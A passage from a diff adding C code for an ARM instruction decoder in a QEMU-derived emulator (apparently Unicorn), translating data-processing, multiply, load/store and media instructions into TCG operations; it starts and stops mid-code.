tmp, tcg_ctx->cpu_env); + } + store_reg(s, rd, tmp); + } + break; + case 0x1: + if (op1 == 1) { + /* branch/exchange thumb (bx). */ + ARCH(4T); + tmp = load_reg(s, rm); + gen_bx(s, tmp); + } else if (op1 == 3) { + /* clz */ + ARCH(5); + rd = (insn >> 12) & 0xf; + tmp = load_reg(s, rm); + gen_helper_clz(tcg_ctx, tmp, tmp); + store_reg(s, rd, tmp); + } else { + goto illegal_op; + } + break; + case 0x2: + if (op1 == 1) { + ARCH(5J); /* bxj */ + /* Trivial implementation equivalent to bx. */ + tmp = load_reg(s, rm); + gen_bx(s, tmp); + } else { + goto illegal_op; + } + break; + case 0x3: + if (op1 != 1) + goto illegal_op; + + ARCH(5); + /* branch link/exchange thumb (blx) */ + tmp = load_reg(s, rm); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, s->pc); + store_reg(s, 14, tmp2); + gen_bx(s, tmp); + break; + case 0x4: + { + /* crc32/crc32c */ + uint32_t c = extract32(insn, 8, 4); + + /* Check this CPU supports ARMv8 CRC instructions. + * op1 == 3 is UNPREDICTABLE but handle as UNDEFINED. + * Bits 8, 10 and 11 should be zero. + */ + if (!arm_dc_feature(s, ARM_FEATURE_CRC) || op1 == 0x3 || + (c & 0xd) != 0) { + goto illegal_op; + } + + rn = extract32(insn, 16, 4); + rd = extract32(insn, 12, 4); + + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if (op1 == 0) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xff); + } else if (op1 == 1) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff); + } + tmp3 = tcg_const_i32(tcg_ctx, 1 << op1); + if (c & 0x2) { + gen_helper_crc32c(tcg_ctx, tmp, tmp, tmp2, tmp3); + } else { + gen_helper_crc32(tcg_ctx, tmp, tmp, tmp2, tmp3); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + store_reg(s, rd, tmp); + break; + } + case 0x5: /* saturating add/subtract */ + ARCH(5TE); + rd = (insn >> 12) & 0xf; + rn = (insn >> 16) & 0xf; + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rn); + if (op1 & 2) + gen_helper_double_saturate(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2); + if (op1 & 1) + gen_helper_sub_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_add_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 7: + { + int imm16 = extract32(insn, 0, 4) | (extract32(insn, 8, 12) << 4); + switch (op1) { + case 1: + /* bkpt */ + ARCH(5); + gen_exception_insn(s, 4, EXCP_BKPT, + syn_aa32_bkpt(imm16, false)); + break; + case 2: + /* Hypervisor call (v7) */ + ARCH(7); + if (IS_USER(s)) { + goto illegal_op; + } + gen_hvc(s, imm16); + break; + case 3: + /* Secure monitor call (v6+) */ + ARCH(6K); + if (IS_USER(s)) { + goto illegal_op; + } + gen_smc(s); + break; + default: + goto illegal_op; + } + break; + } + case 0x8: /* signed multiply */ + case 0xa: + case 0xc: + case 0xe: + ARCH(5TE); + rs = (insn >> 8) & 0xf; + rn = (insn >> 12) & 0xf; + rd = (insn >> 16) & 0xf; + if (op1 == 1) { + /* (32 * 16) >> 16 */ + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + if (sh & 4) + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, 16); + else + gen_sxth(tmp2); + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 16); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + if ((sh & 2) == 0) { + tmp2 = load_reg(s, rn); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rd, tmp); + } else { + /* 16 * 16 */ + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + gen_mulxy(s, tmp, tmp2, sh & 2, sh & 4); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op1 == 2) { + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_addq(s, tmp64, rn, rd); + gen_storeq_reg(s, rn, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (op1 == 0) { + tmp2 = load_reg(s, rn); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rd, tmp); + } + } + break; + default: + goto illegal_op; + } + } else if (((insn & 0x0e000000) == 0 && + (insn & 0x00000090) != 0x90) || + ((insn & 0x0e000000) == (1 << 25))) { + int set_cc, logic_cc, shiftop; + + op1 = (insn >> 21) & 0xf; + set_cc = (insn >> 20) & 1; + logic_cc = table_logic_cc[op1] & set_cc; + + /* data processing instruction */ + if (insn & (1 << 25)) { + /* immediate operand */ + val = insn & 0xff; + shift = ((insn >> 8) & 0xf) * 2; + if (shift) { + val = (val >> shift) | (val << (32 - shift)); + } + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, val); + if (logic_cc && shift) { + gen_set_CF_bit31(s, tmp2); + } + } else { + /* register */ + rm = (insn) & 0xf; + tmp2 = load_reg(s, rm); + shiftop = (insn >> 5) & 3; + if (!(insn & (1 << 4))) { + shift = (insn >> 7) & 0x1f; + gen_arm_shift_im(s, tmp2, shiftop, shift, logic_cc); + } else { + rs = (insn >> 8) & 0xf; + tmp = load_reg(s, rs); + gen_arm_shift_reg(s, tmp2, shiftop, tmp, logic_cc); + } + } + if (op1 != 0x0f && op1 != 0x0d) { + rn = (insn >> 16) & 0xf; + tmp = load_reg(s, rn); + } else { + TCGV_UNUSED_I32(tmp); + } + rd = (insn >> 12) & 0xf; + switch(op1) { + case 0x00: + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x01: + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x02: + if (set_cc && rd == 15) { + /* SUBS r15, ... is used for exception return. */ + if (IS_USER(s)) { + goto illegal_op; + } + gen_sub_CC(s, tmp, tmp, tmp2); + gen_exception_return(s, tmp); + } else { + if (set_cc) { + gen_sub_CC(s, tmp, tmp, tmp2); + } else { + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + } + break; + case 0x03: + if (set_cc) { + gen_sub_CC(s, tmp, tmp2, tmp); + } else { + tcg_gen_sub_i32(tcg_ctx, tmp, tmp2, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x04: + if (set_cc) { + gen_add_CC(s, tmp, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + break; + case 0x05: + if (set_cc) { + gen_adc_CC(s, tmp, tmp, tmp2); + } else { + gen_add_carry(s, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + break; + case 0x06: + if (set_cc) { + gen_sbc_CC(s, tmp, tmp, tmp2); + } else { + gen_sub_carry(s, tmp, tmp, tmp2); + } + store_reg_bx(s, rd, tmp); + break; + case 0x07: + if (set_cc) { + gen_sbc_CC(s, tmp, tmp2, tmp); + } else { + gen_sub_carry(s, tmp, tmp2, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x08: + if (set_cc) { + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + gen_logic_CC(s, tmp); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x09: + if (set_cc) { + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + gen_logic_CC(s, tmp); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x0a: + if (set_cc) { + gen_sub_CC(s, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x0b: + if (set_cc) { + gen_add_CC(s, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0x0c: + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + case 0x0d: + if (logic_cc && rd == 15) { + /* MOVS r15, ... is used for exception return. */ + if (IS_USER(s)) { + goto illegal_op; + } + gen_exception_return(s, tmp2); + } else { + if (logic_cc) { + gen_logic_CC(s, tmp2); + } + store_reg_bx(s, rd, tmp2); + } + break; + case 0x0e: + tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp); + } + store_reg_bx(s, rd, tmp); + break; + default: + case 0x0f: + tcg_gen_not_i32(tcg_ctx, tmp2, tmp2); + if (logic_cc) { + gen_logic_CC(s, tmp2); + } + store_reg_bx(s, rd, tmp2); + break; + } + if (op1 != 0x0f && op1 != 0x0d) { + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } else { + /* other instructions */ + op1 = (insn >> 24) & 0xf; + switch(op1) { + case 0x0: + case 0x1: + /* multiplies, extra load/stores */ + sh = (insn >> 5) & 3; + if (sh == 0) { + if (op1 == 0x0) { + rd = (insn >> 16) & 0xf; + rn = (insn >> 12) & 0xf; + rs = (insn >> 8) & 0xf; + rm = (insn) & 0xf; + op1 = (insn >> 20) & 0xf; + switch (op1) { + case 0: case 1: case 2: case 3: case 6: + /* 32 bit mul */ + tmp = load_reg(s, rs); + tmp2 = load_reg(s, rm); + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (insn & (1 << 22)) { + /* Subtract (mls) */ + ARCH(6T2); + tmp2 = load_reg(s, rn); + tcg_gen_sub_i32(tcg_ctx, tmp, tmp2, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else if (insn & (1 << 21)) { + /* Add */ + tmp2 = load_reg(s, rn); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + if (insn & (1 << 20)) + gen_logic_CC(s, tmp); + store_reg(s, rd, tmp); + break; + case 4: + /* 64 bit mul double accumulate (UMAAL) */ + ARCH(6); + tmp = load_reg(s, rs); + tmp2 = load_reg(s, rm); + tmp64 = gen_mulu_i64_i32(s, tmp, tmp2); + gen_addq_lo(s, tmp64, rn); + gen_addq_lo(s, tmp64, rd); + gen_storeq_reg(s, rn, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + break; + case 8: case 9: case 10: case 11: + case 12: case 13: case 14: case 15: + /* 64 bit mul: UMULL, UMLAL, SMULL, SMLAL. */ + tmp = load_reg(s, rs); + tmp2 = load_reg(s, rm); + if (insn & (1 << 22)) { + tcg_gen_muls2_i32(tcg_ctx, tmp, tmp2, tmp, tmp2); + } else { + tcg_gen_mulu2_i32(tcg_ctx, tmp, tmp2, tmp, tmp2); + } + if (insn & (1 << 21)) { /* mult accumulate */ + TCGv_i32 al = load_reg(s, rn); + TCGv_i32 ah = load_reg(s, rd); + tcg_gen_add2_i32(tcg_ctx, tmp, tmp2, tmp, tmp2, al, ah); + tcg_temp_free_i32(tcg_ctx, al); + tcg_temp_free_i32(tcg_ctx, ah); + } + if (insn & (1 << 20)) { + gen_logicq_cc(s, tmp, tmp2); + } + store_reg(s, rn, tmp); + store_reg(s, rd, tmp2); + break; + default: + goto illegal_op; + } + } else { + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + if (insn & (1 << 23)) { + /* load/store exclusive */ + int op2 = (insn >> 8) & 3; + op1 = (insn >> 21) & 0x3; + + switch (op2) { + case 0: /* lda/stl */ + if (op1 == 1) { + goto illegal_op; + } + ARCH(8); + break; + case 1: /* reserved */ + goto illegal_op; + case 2: /* ldaex/stlex */ + ARCH(8); + break; + case 3: /* ldrex/strex */ + if (op1) { + ARCH(6K); + } else { + ARCH(6); + } + break; + } + + addr = tcg_temp_local_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + + /* Since the emulation does not have barriers, + the acquire/release semantics need no special + handling */ + if (op2 == 0) { + if (insn & (1 << 20)) { + tmp = tcg_temp_new_i32(tcg_ctx); + switch (op1) { + case 0: /* lda */ + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* ldab */ + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 3: /* ldah */ + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + store_reg(s, rd, tmp); + } else { + rm = insn & 0xf; + tmp = load_reg(s, rm); + switch (op1) { + case 0: /* stl */ + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* stlb */ + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 3: /* stlh */ + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + } else if (insn & (1 << 20)) { + switch (op1) { + case 0: /* ldrex */ + gen_load_exclusive(s, rd, 15, addr, 2); + break; + case 1: /* ldrexd */ + gen_load_exclusive(s, rd, rd + 1, addr, 3); + break; + case 2: /* ldrexb */ + gen_load_exclusive(s, rd, 15, addr, 0); + break; + case 3: /* ldrexh */ + gen_load_exclusive(s, rd, 15, addr, 1); + break; + default: + abort(); + } + } else { + rm = insn & 0xf; + switch (op1) { + case 0: /* strex */ + gen_store_exclusive(s, rd, rm, 15, addr, 2); + break; + case 1: /* strexd */ + gen_store_exclusive(s, rd, rm, rm + 1, addr, 3); + break; + case 2: /* strexb */ + gen_store_exclusive(s, rd, rm, 15, addr, 0); + break; + case 3: /* strexh */ + gen_store_exclusive(s, rd, rm, 15, addr, 1); + break; + default: + abort(); + } + } + tcg_temp_free_i32(tcg_ctx, addr); + } else { + /* SWP instruction */ + rm = (insn) & 0xf; + + /* ??? This is not really atomic. However we know + we never have multiple CPUs running in parallel, + so it is good enough. */ + addr = load_reg(s, rn); + tmp = load_reg(s, rm); + tmp2 = tcg_temp_new_i32(tcg_ctx); + if (insn & (1 << 22)) { + gen_aa32_ld8u(s, tmp2, addr, get_mem_index(s)); + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + } else { + gen_aa32_ld32u(s, tmp2, addr, get_mem_index(s)); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + store_reg(s, rd, tmp2); + } + } + } else { + int address_offset; + int load = insn & (1 << 20); + int wbit = insn & (1 << 21); + int pbit = insn & (1 << 24); + int doubleword = 0; + /* Misc load/store */ + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + if (!load && (sh & 2)) { + /* doubleword */ + ARCH(5TE); + if (rd & 1) { + /* UNPREDICTABLE; we choose to UNDEF */ + goto illegal_op; + } + load = (sh & 1) == 0; + doubleword = 1; + } + addr = load_reg(s, rn); + if (pbit) + gen_add_datah_offset(s, insn, 0, addr); + address_offset = 0; + if (doubleword) { + if (!load) { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = load_reg(s, rd + 1); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + rd++; + } + address_offset = -4; + } else if (load) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + switch(sh) { + case 1: + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 2: + gen_aa32_ld8s(s, tmp, addr, get_mem_index(s)); + break; + default: + case 3: + gen_aa32_ld16s(s, tmp, addr, get_mem_index(s)); + break; + } + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + /* Perform base writeback before the loaded value to + ensure correct behavior with overlapping index registers. + ldrd with base writeback is is undefined if the + destination and index registers overlap. */ + if (!pbit) { + gen_add_datah_offset(s, insn, address_offset, addr); + store_reg(s, rn, addr); + } else if (wbit) { + if (address_offset) + tcg_gen_addi_i32(tcg_ctx, addr, addr, address_offset); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + if (load) { + /* Complete the load. */ + store_reg(s, rd, tmp); + } + } + break; + case 0x4: + case 0x5: + goto do_ldst; + case 0x6: + case 0x7: + if (insn & (1 << 4)) { + ARCH(6); + /* Armv6 Media instructions. */ + rm = insn & 0xf; + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + rs = (insn >> 8) & 0xf; + switch ((insn >> 23) & 3) { + case 0: /* Parallel add/subtract. */ + op1 = (insn >> 20) & 7; + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + sh = (insn >> 5) & 7; + if ((op1 & 3) == 0 || sh == 5 || sh == 6) + goto illegal_op; + gen_arm_parallel_addsub(s, op1, sh, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 1: + if ((insn & 0x00700020) == 0) { + /* Halfword pack. */ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + shift = (insn >> 7) & 0x1f; + if (insn & (1 << 6)) { + /* pkhtb */ + if (shift == 0) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff0000); + tcg_gen_ext16u_i32(tcg_ctx, tmp2, tmp2); + } else { + /* pkhbt */ + if (shift) + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff0000); + } + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x00200020) == 0x00200000) { + /* [us]sat */ + tmp = load_reg(s, rm); + shift = (insn >> 7) & 0x1f; + if (insn & (1 << 6)) { + if (shift == 0) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, tmp, tmp, shift); + } else { + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); + } + sh = (insn >> 16) & 0x1f; + tmp2 = tcg_const_i32(tcg_ctx, sh); + if (insn & (1 << 22)) + gen_helper_usat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_ssat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x00300fe0) == 0x00200f20) { + /* [us]sat16 */ + tmp = load_reg(s, rm); + sh = (insn >> 16) & 0x1f; + tmp2 = tcg_const_i32(tcg_ctx, sh); + if (insn & (1 << 22)) + gen_helper_usat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_ssat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x00700fe0) == 0x00000fa0) { + /* Select bytes. */ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + tmp3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp3, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + gen_helper_sel_flags(tcg_ctx, tmp, tmp3, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((insn & 0x000003e0) == 0x00000060) { + tmp = load_reg(s, rm); + shift = (insn >> 10) & 3; + /* ??? In many cases it's not necessary to do a + rotate, a shift is sufficient. */ + if (shift != 0) + tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, shift * 8); + op1 = (insn >> 20) & 7; + switch (op1) { + case 0: gen_sxtb16(tmp); break; + case 2: gen_sxtb(tmp); break; + case 3: gen_sxth(tmp); break; + case 4: gen_uxtb16(tmp); break; + case 6: gen_uxtb(tmp); break; + case 7: gen_uxth(tmp); break; + default: goto illegal_op; + } + if (rn != 15) { + tmp2 = load_reg(s, rn); + if ((op1 & 3) == 0) { + gen_add16(s, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } + store_reg(s, rd, tmp); + } else if ((insn & 0x003f0f60) == 0x003f0f20) { + /* rev */ + tmp = load_reg(s, rm); + if (insn & (1 << 22)) { + if (insn & (1 << 7)) { + gen_revsh(s, tmp); + } else { + ARCH(6T2); + gen_helper_rbit(tcg_ctx, tmp, tmp); + } + } else { + if (insn & (1 << 7)) + gen_rev16(s, tmp); + else + tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); + } + store_reg(s, rd, tmp); + } else { + goto illegal_op; + } + break; + case 2: /* Multiplies (Type 3). */ + switch ((insn >> 20) & 0x7) { + case 5: + if (((insn >> 6) ^ (insn >> 7)) & 1) { + /* op2 not 00x or 11x : UNDEF */ + goto illegal_op; + } + /* Signed multiply most significant [accumulate]. + (SMMUL, SMMLA, SMMLS) */ + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + + if (rd != 15) { + tmp = load_reg(s, rd); + if (insn & (1 << 6)) { + tmp64 = gen_subq_msw(s, tmp64, tmp); + } else { + tmp64 = gen_addq_msw(s, tmp64, tmp); + } + } + if (insn & (1 << 5)) { + tcg_gen_addi_i64(tcg_ctx, tmp64, tmp64, 0x80000000u); + } + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + store_reg(s, rn, tmp); + break; + case 0: + case 4: + /* SMLAD, SMUAD, SMLSD, SMUSD, SMLALD, SMLSLD */ + if (insn & (1 << 7)) { + goto illegal_op; + } + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + if (insn & (1 << 5)) + gen_swap_half(s, tmp2); + gen_smul_dual(s, tmp, tmp2); + if (insn & (1 << 22)) { + /* smlald, smlsld */ + TCGv_i64 tmp64_2; + + tmp64 = tcg_temp_new_i64(tcg_ctx); + tmp64_2 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64_2, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (insn & (1 << 6)) { + tcg_gen_sub_i64(tcg_ctx, tmp64, tmp64, tmp64_2); + } else { + tcg_gen_add_i64(tcg_ctx, tmp64, tmp64, tmp64_2); + } + tcg_temp_free_i64(tcg_ctx, tmp64_2); + gen_addq(s, tmp64, rd, rn); + gen_storeq_reg(s, rd, rn, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + /* smuad, smusd, smlad, smlsd */ + if (insn & (1 << 6)) { + /* This subtraction cannot overflow. */ + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } else { + /* This addition cannot overflow 32 bits; + * however it may overflow considered as a + * signed operation, in which case we must set + * the Q flag. + */ + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rd != 15) + { + tmp2 = load_reg(s, rd); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rn, tmp); + } + break; + case 1: + case 3: + /* SDIV, UDIV */ + if (!arm_dc_feature(s, ARM_FEATURE_ARM_DIV)) { + goto illegal_op; + } + if (((insn >> 5) & 7) || (rd != 15)) { + goto illegal_op; + } + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + if (insn & (1 << 21)) { + gen_helper_udiv(tcg_ctx, tmp, tmp, tmp2); + } else { + gen_helper_sdiv(tcg_ctx, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rn, tmp); + break; + default: + goto illegal_op; + } + break; + case 3: + op1 = ((insn >> 17) & 0x38) | ((insn >> 5) & 7); + switch (op1) { + case 0: /* Unsigned sum of absolute differences. */ + ARCH(6); + tmp = load_reg(s, rm); + tmp2 = load_reg(s, rs); + gen_helper_usad8(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rd != 15) { + tmp2 = load_reg(s, rd); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rn, tmp); + break; + case 0x20: case 0x24: case 0x28: case 0x2c: + /* Bitfield insert/clear. */ + ARCH(6T2); + shift = (insn >> 7) & 0x1f; + i = (insn >> 16) & 0x1f; + i = i + 1 - shift; + if (rm == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rm); + } + if (i != 32) { + tmp2 = load_reg(s, rd); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, shift, i); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + store_reg(s, rd, tmp); + break; + case 0x12: case 0x16: case 0x1a: case 0x1e: /* sbfx */ + case 0x32: case 0x36: case 0x3a: case 0x3e: /* ubfx */ + ARCH(6T2); + tmp = load_reg(s, rm); + shift = (insn >> 7) & 0x1f; + i = ((insn >> 16) & 0x1f) + 1; + if (shift + i > 32) + goto illegal_op; + if (i < 32) { + if (op1 & 0x20) { + gen_ubfx(s, tmp, shift, (1u << i) - 1); + } else { + gen_sbfx(s, tmp, shift, i); + } + } + store_reg(s, rd, tmp); + break; + default: + goto illegal_op; + } + break; + } + break; + } + do_ldst: + /* Check for undefined extension instructions + * per the ARM Bible IE: + * xxxx 0111 1111 xxxx xxxx xxxx 1111 xxxx + */ + sh = (0xf << 20) | (0xf << 4); + if (op1 == 0x7 && ((insn & sh) == sh)) + { + goto illegal_op; + } + /* load/store byte/word */ + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + tmp2 = load_reg(s, rn); + if ((insn & 0x01200000) == 0x00200000) { + /* ldrt/strt */ + i = MMU_USER_IDX; + } else { + i = get_mem_index(s); + } + if (insn & (1 << 24)) + gen_add_data_offset(s, insn, tmp2); + if (insn & (1 << 20)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (insn & (1 << 22)) { + gen_aa32_ld8u(s, tmp, tmp2, i); + } else { + gen_aa32_ld32u(s, tmp, tmp2, i); + } + } else { + /* store */ + tmp = load_reg(s, rd); + if (insn & (1 << 22)) { + gen_aa32_st8(s, tmp, tmp2, i); + } else { + gen_aa32_st32(s, tmp, tmp2, i); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + if (!(insn & (1 << 24))) { + gen_add_data_offset(s, insn, tmp2); + store_reg(s, rn, tmp2); + } else if (insn & (1 << 21)) { + store_reg(s, rn, tmp2); + } else { + tcg_temp_free_i32(tcg_ctx, tmp2); + } + if (insn & (1 << 20)) { + /* Complete the load. */ + store_reg_from_load(s, rd, tmp); + } + break; + case 0x08: + case 0x09: + { + int j, n, user, loaded_base; + TCGv_i32 loaded_var; + /* load/store multiple words */ + /* XXX: store correct base if write back */ + user = 0; + if (insn & (1 << 22)) { + if (IS_USER(s)) + goto illegal_op; /* only usable in supervisor mode */ + + if ((insn & (1 << 15)) == 0) + user = 1; + } + rn = (insn >> 16) & 0xf; + addr = load_reg(s, rn); + + /* compute total size */ + loaded_base = 0; + TCGV_UNUSED_I32(loaded_var); + n = 0; + for(i=0;i<16;i++) { + if (insn & (1 << i)) + n++; + } + /* XXX: test invalid n == 0 case ? */ + if (insn & (1 << 23)) { + if (insn & (1 << 24)) { + /* pre increment */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } else { + /* post increment */ + } + } else { + if (insn & (1 << 24)) { + /* pre decrement */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4)); + } else { + /* post decrement */ + if (n != 1) + tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4)); + } + } + j = 0; + for(i=0;i<16;i++) { + if (insn & (1 << i)) { + if (insn & (1 